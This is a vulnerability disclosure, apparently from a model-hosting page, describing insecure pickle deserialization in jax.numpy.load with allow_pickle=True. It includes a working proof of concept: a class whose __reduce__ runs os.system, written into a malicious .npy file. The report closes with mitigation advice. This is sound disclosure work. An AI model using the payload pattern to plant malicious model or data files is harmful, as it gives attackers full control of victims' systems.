Arbitrary Code Execution in jax.numpy.load via Insecure Deserialization

Summary

The jax.numpy.load function in the JAX library is vulnerable to arbitrary code execution when loading a maliciously crafted .npy file if the allow_pickle parameter is set to True. This occurs because jax.numpy.load is a wrapper around numpy.load, which uses the inherently insecure pickle module for deserialization when allow_pickle=True.

Vulnerability Details

  • Component: jax.numpy.load
  • File: jax/_src/numpy/lax_numpy.py
  • Vulnerability Type: Insecure Deserialization (CWE-502)
  • Impact: Arbitrary Code Execution (ACE)

The implementation of jax.numpy.load is as follows:

@export
def load(file: IO[bytes] | str | os.PathLike[Any], *args: Any, **kwargs: Any) -> Array:
  # ... (docstring)
  out = np.load(file, *args, **kwargs)
  # ... (post-processing)
  return out

By passing allow_pickle=True as a keyword argument, the underlying np.load call will use pickle.load to deserialize the file content. An attacker can provide a specially crafted file that, when unpickled, executes arbitrary system commands.

Proof of Concept (PoC)

Steps to Reproduce:

  1. Create a malicious .npy file using the following script:
import jax.numpy as jnp
import os
import pickle

class Malicious:
    def __reduce__(self):
        return (os.system, ('id',))

with open('malicious.npy', 'wb') as f:
    pickle.dump(Malicious(), f)
  1. Load the malicious file using jax.numpy.load with allow_pickle=True:
import jax.numpy as jnp
jnp.load('malicious.npy', allow_pickle=True)
  1. Observe the execution of the id command.

Impact

An attacker can distribute malicious model files or data files in .npy format. If a user is convinced to load such a file using jax.numpy.load(..., allow_pickle=True), the attacker gains full control over the user's system.

Recommendations

  1. Deprecate or restrict allow_pickle: Discourage the use of allow_pickle=True in jax.numpy.load.
  2. Documentation Warning: Add a prominent security warning to the jax.numpy.load docstring, similar to the one in numpy.load.
  3. Safe Alternatives: Encourage users to use safer serialization formats like safetensors or msgpack (as used in Flax/Orbax).
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support